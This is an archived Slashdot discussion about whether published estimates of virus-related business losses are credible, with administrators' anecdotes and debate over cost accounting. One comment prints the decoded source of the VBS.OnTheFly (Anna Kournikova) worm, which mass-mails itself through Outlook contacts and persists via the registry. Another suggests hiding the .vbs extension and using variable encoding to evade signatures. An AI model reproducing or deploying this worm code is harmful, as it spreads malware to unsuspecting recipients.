Slashdot Mirror
How Much Do Computer Virus Attacks Really Cost?
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
I happened to see the O'Reilly book on VB Script this weekend, & was amazed to see their choice for the animal on the cover . . .
A flu virus?
The collophon claims this is a drawing of a Sea Urchin. I'm not convinced.
Geoff
I think I see a trend here. Maybe for them it really would be easier to muzzle the entire internet than to produce p
What complete tosh.
Let imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So thats the cost before you even talk about time.
Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average persons time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.
Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".
I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.
An Eye for an Eye will make the whole world blind - Gandhi
No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!
Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.
And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.
Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?
No Laughing Allowed!
We've got a few thousand users in fifteen countries. If all infections were like todays spat of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.
But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.
Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.
Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someones ass.
.sig: Now legally binding!
So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!
But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.
... poor software. I think windows should say on the box "insecure by default". Any network program that is designed for end users and not computer geeks should have safety built in. I can see a flaw slipping by the programmers that would allow a worm or security breach. I can't imagine selling a product that is so insecure that anyone with a little experiance can sit down and write a worm/virus/script to exploit, then never admit that the product was flawed.
Maybe these companies should be able to sue Microsoft, for lost time and money.
Environmentalists are their own worst enemy. ~tricklenews.com
Here's an example.
:-> )
Small company of 100 people, open 250 days/year.
Annual GROSS income $5 million.
$5m/250days/8hours = $2500/hr.
Virus comes in, hits 24 people.
Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary,
including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person
Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!
For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:
1) All work time is computer time for all staff infected.
2) Time spent repairing the damage is outside of normal duties for the admin.
3) All staff work at 100% efficiency all of the time.
4) Time spent repairing the damage can't be done when the staff aren't around.
In other words, the numbers quoted are nothing more than so much bullshit.
"People who do stupid things with hazardous materials often die." -- Jim Davidson on alt.folklore.urban
You figured it out. It adds the registry entry to know if the system has been infected before, then e-mails itself to everybody in your address list. If it is Jan 26th, it opens that web page. Yes, it's weird that it tries to open that web page in the past, but who knows (maybe the author released it in the wild back then, and only now hit corporate servers).
McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...
What's interesting is how it decodes itself from the string. I kind of remember a couple VBS virus doing that earlier.
It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use a variable encoding keys, which would make it harder to create signatures.
Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.
Hey, street crime wouldn't cost anything if people all stayed inside.
This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
Basically A map of stupidity...
Is Your State Stupid?
Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha!this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.
I bet you all have this same guy working in your office. Admit it, it's probably you.
omega_rob -- friend of the bonsai kitten
It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.
Ben Schumin :-)
Therefore things like software piracy, virus attacks, are not losses.
Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.
If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.
The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.
This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected, which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.
</rant>
--
A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped up that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.
-B
Viruses are probably even MORE costly. Consider:
- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.
and so on.
Let's suppose it's a high-tek company on the rise. And lets suppose this delays its product introduction by one day.
Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.
Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.
(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)
Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.
Computing the PROVABLE direct loss is another story entirely.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Virus myths: Ahh the good old days when the Good Times virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!
Mmmm.. Donuts
I don't have costs on viruses out there> I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string
e r(0)& "\AnnaKournikova.jpg.vbs"
, True)
;o)"
<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFold
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have,
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>
It can cost a lot when a business gets hit hard by a virus..but it shouldn't.
.vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.
.vbs files TODAY, you need to be asking why not.
Take today for example..that big new scary
As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.
If you're not blocking
Windows ME sells for 169.99 at Amazon.com
Je t'aime Stéphanie
As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.
argh!